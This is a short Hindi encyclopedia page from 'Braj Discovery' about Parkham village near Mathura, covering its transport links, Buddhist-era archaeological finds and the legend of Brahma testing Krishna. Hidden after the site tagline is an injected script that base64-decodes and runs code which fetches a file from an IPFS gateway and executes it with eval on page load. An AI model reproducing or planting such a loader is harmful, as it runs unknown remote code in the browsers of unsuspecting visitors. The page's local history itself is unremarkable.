परखम

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
नेविगेशन पर जाएँ खोज पर जाएँ

परखम / Parkham

  • यह मथुरा तहसील के अन्तर्गत एक पुराना गाँव है।
  • यह रेल एवं सड़क मार्गों द्वारा अन्य स्थानों से जुड़ा हुआ है।
  • परखम जनाई गाँव से एक मील पश्चिम में है।
  • यहाँ पर बौद्धकालीन पुरातत्व सामग्री प्रचुर मात्रा में मिली है। इससे प्रतीत होता है कि बौद्ध काल में बौद्धधर्म का एक अच्छा केन्द्र था।
  • यहाँ के पुरातत्व अवशेष संग्रहालय में सुरक्षित हैं।
  • यहाँ ब्रह्माजी ने कृष्ण की परीक्षा ली थी।
  • अतएव इस स्थान का नाम परखम पड़ा है।
  • सखाओं के साथ बैठकर कृष्ण को उनका उच्छिष्ट भोजन करते देखकर उनकी भगवत्ता की परीक्षा के लिए ब्रह्माजी की इच्छा हुई।
  • परीक्षा की इच्छा के लिए इस स्थान का नाम परखम हुआ।